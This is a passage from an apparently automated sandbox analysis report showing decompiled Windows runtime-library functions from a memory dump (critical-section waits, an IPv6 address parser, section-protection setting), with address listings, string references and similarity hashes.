					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                          0x007753ab
                                          0x007753ae
                                          0x007753b1
                                          0x007753b4
                                          0x007753b7
                                          0x007905b6
                                          0x007905c0
                                          0x007905c3
                                          0x00000000
                                          0x007905c9
                                          0x007905c9
                                          0x007905cc
                                          0x007905d5
                                          0x007905d5
                                          0x007753bd
                                          0x007753bd
                                          0x007753bd
                                          0x007753be
                                          0x007753be
                                          0x007753be
                                          0x007753c0
                                          0x00000000
                                          0x00000000
                                          0x007b2269
                                          0x007b226d
                                          0x007b2349
                                          0x007b234d
                                          0x007b2273
                                          0x007b2276
                                          0x007b2279
                                          0x007b227e
                                          0x007b2283
                                          0x007b2287
                                          0x007b228a
                                          0x007b228d
                                          0x007b228f
                                          0x007b22bc
                                          0x007b22bc
                                          0x007b22bc
                                          0x007b22be
                                          0x007b22c4
                                          0x007b22cc
                                          0x007b22d0
                                          0x007b22d6
                                          0x007b22d7
                                          0x007b22da
                                          0x007b22df
                                          0x007b22e4
                                          0x00000000
                                          0x00000000
                                          0x007b22e6
                                          0x007b22e9
                                          0x007b22f4
                                          0x007b22f9
                                          0x007b22fa
                                          0x007b2305
                                          0x007b2314
                                          0x007b2319
                                          0x007b231a
                                          0x007b231d
                                          0x007b2320
                                          0x007b2323
                                          0x007b2323
                                          0x007b2328
                                          0x007b232d
                                          0x007b232f
                                          0x007b2331
                                          0x007b2336
                                          0x007b2336
                                          0x007b233b
                                          0x007b233d
                                          0x007b2350
                                          0x007b2351
                                          0x007b2356
                                          0x007b2359
                                          0x007b2359
                                          0x007b235b
                                          0x007b235d
                                          0x00775367
                                          0x0077536b
                                          0x00775372
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b2363
                                          0x007b2363
                                          0x007b2369
                                          0x007b236a
                                          0x007b236c
                                          0x007b2371
                                          0x007b2373
                                          0x00000000
                                          0x007b2379
                                          0x007b2379
                                          0x007b237a
                                          0x007b237f
                                          0x007b237f
                                          0x007b2385
                                          0x007b2386
                                          0x007b2389
                                          0x007b238e
                                          0x007b2390
                                          0x00775378
                                          0x0077537c
                                          0x007b2396
                                          0x007b2396
                                          0x007b2397
                                          0x007b239c
                                          0x007b23a2
                                          0x007b23a3
                                          0x007b23a6
                                          0x007b23ab
                                          0x007b23ad
                                          0x00000000
                                          0x007b23b3
                                          0x007b23b3
                                          0x007b23b4
                                          0x007b23b9
                                          0x007b23ba
                                          0x007b23ba
                                          0x007b23bc
                                          0x007b23bf
                                          0x00000000
                                          0x00000000
                                          0x007a9153
                                          0x007a9158
                                          0x007a915a
                                          0x007a915e
                                          0x007a9160
                                          0x00000000
                                          0x007a9166
                                          0x007a9166
                                          0x007a9171
                                          0x007a9176
                                          0x007a9176
                                          0x00000000
                                          0x007a9160
                                          0x007b23c6
                                          0x007b23cb
                                          0x007b23ce
                                          0x007b23d7
                                          0x007b23d7
                                          0x007b23ad
                                          0x007b2390
                                          0x007b2373
                                          0x007b233f
                                          0x007b233f
                                          0x00000000
                                          0x007b233f
                                          0x007b2291
                                          0x007b2291
                                          0x007b2293
                                          0x007b2295
                                          0x007b229a
                                          0x007b22a1
                                          0x007b22a3
                                          0x007b22a7
                                          0x007b22a9
                                          0x00000000
                                          0x00000000
                                          0x007b22ab
                                          0x007b22ad
                                          0x007b22af
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b22af
                                          0x007b22b1
                                          0x007b22b4
                                          0x007b22b4
                                          0x007b22b6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x007b22b6
                                          0x007b228f
                                          0x00000000
                                          0x007b226d
                                          0x007753cb
                                          0x007753ce
                                          0x007753d0
                                          0x007753d4
                                          0x007753d6
                                          0x00000000
                                          0x007753d8
                                          0x007753e3
                                          0x007753ea
                                          0x007753ea
                                          0x007753d6
                                          0x00000000

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 007B22F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 007B22FC
                                          • RTL: Re-Waiting, xrefs: 007B2328
                                          • RTL: Resource at %p, xrefs: 007B230B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: 04aca1f3dfc21f5a97b8d802807952ca750117d8c36d0d8c53947b9835a3465f
                                          • Instruction ID: 02c7fc60bc9a85a45c54080d51785a1ca7a64115a9cfeebe436c28a26a0413fa
                                          • Opcode Fuzzy Hash: 04aca1f3dfc21f5a97b8d802807952ca750117d8c36d0d8c53947b9835a3465f
                                          • Instruction Fuzzy Hash: 74513871601701ABDF10DF68DC85FE673D8EF59364F114229FD08DB282EAA9EC4287A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0077EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 51%
                                          			E0077EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0076DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x83793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E007516C0(_t39);
				} else {
					_t40 = E0074F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00793915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E007501A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x83793c; // 0x0
								_push(_t85);
								_t44 = E00751F28(_t71);
							} else {
								_t44 = E0074F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00793915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E007D2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0077EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00794FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E007A3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E007A3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x8320c0;
								if(_t85 != 0x8320c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E007D217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E007A3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                          0x0077ec56
                                          0x0077ec56
                                          0x0077ec56
                                          0x0077ec5c
                                          0x0077ec64
                                          0x007b23e6
                                          0x007b23eb
                                          0x007b23eb
                                          0x0077ec6a
                                          0x0077ec6c
                                          0x0077ec6f
                                          0x007b23f3
                                          0x007b23f8
                                          0x007b23fa
                                          0x007b23fc
                                          0x0077ec75
                                          0x0077ec76
                                          0x0077ec76
                                          0x0077ec7b
                                          0x0077ec7c
                                          0x0077ec7e
                                          0x007b2406
                                          0x007b2407
                                          0x007b240c
                                          0x007b240d
                                          0x007b240d
                                          0x007b240d
                                          0x007b2414
                                          0x007b2417
                                          0x007b241e
                                          0x007b2435
                                          0x007b2438
                                          0x007b243c
                                          0x007b243f
                                          0x007b2442
                                          0x007b2443
                                          0x007b2446
                                          0x007b2449
                                          0x007b2453
                                          0x007b2455
                                          0x007b245b
                                          0x007b245b
                                          0x0077eb99
                                          0x0077eb99
                                          0x0077eb9c
                                          0x0077eb9d
                                          0x0077eb9f
                                          0x0077eba2
                                          0x007b2465
                                          0x007b246b
                                          0x007b246d
                                          0x0077eba8
                                          0x0077eba9
                                          0x0077eba9
                                          0x0077ebae
                                          0x0077ebb3
                                          0x0077ebb9
                                          0x0077ebbb
                                          0x007b2513
                                          0x007b2514
                                          0x007b2519
                                          0x007b251b
                                          0x0077ec2a
                                          0x0077ec2d
                                          0x0077ec33
                                          0x0077ec36
                                          0x0077ec3a
                                          0x0077ec3e
                                          0x0077ec40
                                          0x0077ec47
                                          0x0077ec47
                                          0x0077ec40
                                          0x007522c6
                                          0x0077ebc1
                                          0x0077ebc1
                                          0x0077ebc5
                                          0x0077ec9a
                                          0x0077ec9a
                                          0x0077ebd6
                                          0x0077ebd6
                                          0x00000000
                                          0x0077ebbb
                                          0x007b2477
                                          0x007b247c
                                          0x007b2486
                                          0x007b248b
                                          0x007b2496
                                          0x007b249b
                                          0x007b249d
                                          0x007b24a0
                                          0x007b24a3
                                          0x007b24aa
                                          0x007b24aa
                                          0x007b24a5
                                          0x007b24a5
                                          0x007b24a5
                                          0x007b24ac
                                          0x007b24af
                                          0x007b24b0
                                          0x007b24b3
                                          0x007b24b9
                                          0x007b24ba
                                          0x007b24bb
                                          0x007b24c6
                                          0x007b24cb
                                          0x007b24cd
                                          0x007b24d0
                                          0x007b24d1
                                          0x007b24d4
                                          0x007b24d6
                                          0x007b24d9
                                          0x007b24d9
                                          0x007b24dc
                                          0x007b24df
                                          0x007b24e1
                                          0x007b24e7
                                          0x007b24e9
                                          0x007b24ec
                                          0x007b24ef
                                          0x007b24f2
                                          0x007b24f2
                                          0x007b24ef
                                          0x007b24e7
                                          0x007b24fa
                                          0x007b24ff
                                          0x007b2501
                                          0x007b2503
                                          0x007b2506
                                          0x007b250b
                                          0x0077eb8c
                                          0x0077eb93
                                          0x00000000
                                          0x00000000
                                          0x0077eb93
                                          0x00000000
                                          0x0077eb99
                                          0x0077ec85
                                          0x0077ec85
                                          0x0077ec85
                                          0x00000000

                                          Strings
                                          • RTL: Re-Waiting, xrefs: 007B24FA
                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 007B24BD
                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 007B248D
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                          • API String ID: 0-3177188983
                                          • Opcode ID: d68769386fea6c23df6dc3977aec7ceaf7128c2ab3601c87ccb3d951986f5da0
                                          • Instruction ID: fdd1458e19d5596474d745791ed4bc1c868b2ae8f575ddb117dc8854d8ff8cbe
                                          • Opcode Fuzzy Hash: d68769386fea6c23df6dc3977aec7ceaf7128c2ab3601c87ccb3d951986f5da0
                                          • Instruction Fuzzy Hash: 1541EAB0600204EFCB20DF64DC89FAA77A9EF44320F208655F9599B2D2D77CED428761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0078FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0078FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0078EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0078EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0078685D(_t167, 4) == 0) {
								if(E0078685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0078685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0078685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E00768980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0075DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0078EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0078EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                          0x0078fcd1
                                          0x0078fcd6
                                          0x0078fcd9
                                          0x0078fcdc
                                          0x0078fcdf
                                          0x0078fce2
                                          0x0078fce5
                                          0x0078fce8
                                          0x0078fceb
                                          0x0078fced
                                          0x0078fced
                                          0x0078fcf3
                                          0x00000000
                                          0x00000000
                                          0x0078fcfc
                                          0x0078fcfe
                                          0x0078fdc1
                                          0x007becbd
                                          0x00000000
                                          0x007beccc
                                          0x007beccc
                                          0x007becd2
                                          0x00000000
                                          0x00000000
                                          0x007becdf
                                          0x007bece0
                                          0x007bece4
                                          0x007beceb
                                          0x007becee
                                          0x007beca8
                                          0x007beca8
                                          0x007becaa
                                          0x0078fd76
                                          0x0078fd79
                                          0x0078fdb4
                                          0x0078fdb5
                                          0x0078fdb6
                                          0x00000000
                                          0x0078fdb6
                                          0x0078fd7e
                                          0x007becfc
                                          0x0078fe2f
                                          0x00000000
                                          0x0078fe2f
                                          0x007bed08
                                          0x007bed0f
                                          0x007bed17
                                          0x007bed1b
                                          0x00000000
                                          0x007bed1b
                                          0x0078fd88
                                          0x00000000
                                          0x00000000
                                          0x0078fd94
                                          0x0078fd99
                                          0x0078fda1
                                          0x00000000
                                          0x00000000
                                          0x0078fdb0
                                          0x00000000
                                          0x0078fdb0
                                          0x007becbd
                                          0x0078fdc7
                                          0x0078fdcb
                                          0x00000000
                                          0x0078fdd7
                                          0x0078fde3
                                          0x0078fe06
                                          0x007a1fe7
                                          0x00000000
                                          0x00000000
                                          0x007a1fef
                                          0x007a1ff0
                                          0x007a1ff4
                                          0x007a1ff7
                                          0x007a1ffa
                                          0x007a1ffd
                                          0x007a2000
                                          0x00000000
                                          0x00000000
                                          0x007becf1
                                          0x00000000
                                          0x007becf1
                                          0x00000000
                                          0x0078fe06
                                          0x0078fde8
                                          0x0078fdec
                                          0x0078fdef
                                          0x0078fdf2
                                          0x00000000
                                          0x0078fdf2
                                          0x0078fdcb
                                          0x0078fd04
                                          0x0078fd05
                                          0x007bec67
                                          0x00000000
                                          0x00000000
                                          0x007bec6f
                                          0x00000000
                                          0x007bec6f
                                          0x0078fd13
                                          0x0078fd3c
                                          0x0078fd40
                                          0x007bec75
                                          0x007bec7a
                                          0x00000000
                                          0x007bec8a
                                          0x007bec8a
                                          0x007bec90
                                          0x007becb2
                                          0x0078fd73
                                          0x0078fd73
                                          0x00000000
                                          0x0078fd73
                                          0x007bec95
                                          0x00000000
                                          0x00000000
                                          0x007beca1
                                          0x007beca4
                                          0x007beca5
                                          0x00000000
                                          0x007beca5
                                          0x007bec7a
                                          0x0078fd4a
                                          0x00000000
                                          0x0078fd6e
                                          0x0078fd6e
                                          0x0078fd71
                                          0x00000000
                                          0x0078fd71
                                          0x0078fd4a
                                          0x0078fd21
                                          0x0079a3a1
                                          0x00000000
                                          0x0079a3a1
                                          0x0078fd36
                                          0x007a200b
                                          0x007a2012
                                          0x00000000
                                          0x00000000
                                          0x007a2018
                                          0x00000000
                                          0x007a2018
                                          0x00000000
                                          0x0078fd36
                                          0x0078fe0f
                                          0x0078fe16
                                          0x0079a3ad
                                          0x00000000
                                          0x00000000
                                          0x0079a3b3
                                          0x0079a3b3
                                          0x0078fe1f
                                          0x007bed25
                                          0x007bed86
                                          0x00000000
                                          0x00000000
                                          0x007bed91
                                          0x007bed95
                                          0x007bed95
                                          0x007bed9a
                                          0x007bedad
                                          0x007bedb3
                                          0x007bedba
                                          0x007bedc4
                                          0x007bedc9
                                          0x00000000
                                          0x007bedcc
                                          0x007bed2a
                                          0x007bed55
                                          0x00000000
                                          0x00000000
                                          0x007bed61
                                          0x007bed66
                                          0x007bed6e
                                          0x00000000
                                          0x00000000
                                          0x007bed7d
                                          0x00000000
                                          0x007bed7d
                                          0x007bed30
                                          0x00000000
                                          0x00000000
                                          0x007bed3c
                                          0x007bed43
                                          0x007bed4b
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp Download File
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: __fassign
                                          • String ID:
                                          • API String ID: 3965848254-0
                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction ID: e17d25ff862f6ecf2e481b7dfc8cfda96a82f675a5a084accf6c44a3afb6e2d7
                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                          • Instruction Fuzzy Hash: 04917E71E4020AEFDF24EF98C8456EEB7B4FF95304F24807AD411E6262E7785A81CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 007CE759, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 133COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E007CE759(void* __edx, void* __eflags, intOrPtr _a4, signed short* _a8, char _a11, intOrPtr _a12) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				short _v30;
				signed int _v32;
				char _v40;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short* _t47;
				intOrPtr _t50;
				short _t67;
				signed int _t79;
				signed int _t83;
				void* _t86;
				signed short* _t87;
				intOrPtr _t88;
				void* _t89;

				_t87 = _a8;
				_t79 = 0;
				_v8 = 0;
				_t47 = E00768375(_t87, 0x3d);
				if(_t47 == 0) {
					L23:
					__eflags = 0;
					return 0;
				}
				 *_t47 = 0;
				_t83 =  *_t87 & 0x0000ffff;
				_t92 = _t83 - 0x53;
				if(_t83 != 0x53) {
					__eflags = _t83 - 0x4f;
					if(_t83 != 0x4f) {
						goto L23;
					}
					_t50 = E00805AA6(_t47 + 2,  &_v24, 0x10);
					_t89 = _t89 + 0xc;
					_v8 = _t50;
					__eflags = _t50;
					if(__eflags == 0) {
						goto L23;
					}
					_a11 = 1;
					L6:
					_push(_a4);
					_t86 = E007CE6F3(_t92);
					if(_t86 == _t79) {
						goto L23;
					}
					_t88 = ( *(_t86 + 0x14) & 0x0000ffff) + _t86 + 0x18;
					if(0 >=  *(_t86 + 6)) {
						L22:
						return 1;
					} else {
						goto L8;
					}
					do {
						L8:
						if( *((intOrPtr*)(_t88 + 0xc)) != 0 &&  *((intOrPtr*)(_t88 + 8)) != 0) {
							if(_a11 != 0) {
								_t28 = _t79 + 1; // 0x1
								__eflags = _v8 - _t28;
								if(__eflags != 0) {
									L19:
									if(_a11 != 0) {
										goto L21;
									}
									L20:
									E0075E1C6( &_v40);
									goto L21;
								}
								L18:
								_v12 =  *((intOrPtr*)(_t88 + 8));
								_v16 =  *((intOrPtr*)(_t88 + 0xc)) + _a4;
								_push( &_v20);
								_push(_a12);
								_push( &_v12);
								_push( &_v16);
								E00750048(0xffffffff);
								_push(_v20);
								_push(_v12);
								_push(_v16);
								E007A3F92(0x55, 3, "Set 0x%X protection for %p section for %d bytes, old protection 0x%X\n", _a12);
								_t89 = _t89 + 0x1c;
								if(_a11 != 0) {
									goto L22;
								}
								goto L19;
							}
							_t67 = 8;
							_v30 = _t67;
							_v28 = _t88;
							_v32 = 0;
							while( *((char*)((_v32 & 0x0000ffff) + _t88)) != 0) {
								_v32 = _v32 + 1;
								_t100 = _v32 - 8;
								if(_v32 < 8) {
									continue;
								}
								break;
							}
							_push(1);
							_push( &_v32);
							_push( &_v40);
							if(E0075E755(_t79, _t86, _t88, _t100) < 0) {
								goto L23;
							}
							if(E0076BAA4( &_v48,  &_v40, 1) != 0) {
								goto L20;
							}
							goto L18;
						}
						L21:
						_t79 = _t79 + 1;
						_t88 = _t88 + 0x28;
					} while (_t79 < ( *(_t86 + 6) & 0x0000ffff));
					goto L22;
				}
				E0075E2A8(_t83,  &_v48, _t47 + 2);
				_a11 = 0;
				goto L6;
			}


























                                          0x007ce763
                                          0x007ce769
                                          0x007ce76c
                                          0x007ce76f
                                          0x007ce778
                                          0x007ce8cd
                                          0x007ce8cd
                                          0x00000000
                                          0x007ce8cd
                                          0x007ce780
                                          0x007ce783
                                          0x007ce786
                                          0x007ce78a
                                          0x007ce79e
                                          0x007ce7a2
                                          0x00000000
                                          0x00000000
                                          0x007ce7b2
                                          0x007ce7b7
                                          0x007ce7ba
                                          0x007ce7bd
                                          0x007ce7bf
                                          0x00000000
                                          0x00000000
                                          0x007ce7c5
                                          0x007ce7c9
                                          0x007ce7c9
                                          0x007ce7d1
                                          0x007ce7d5
                                          0x00000000
                                          0x00000000
                                          0x007ce7df
                                          0x007ce7e9
                                          0x007ce8c9
                                          0x00000000
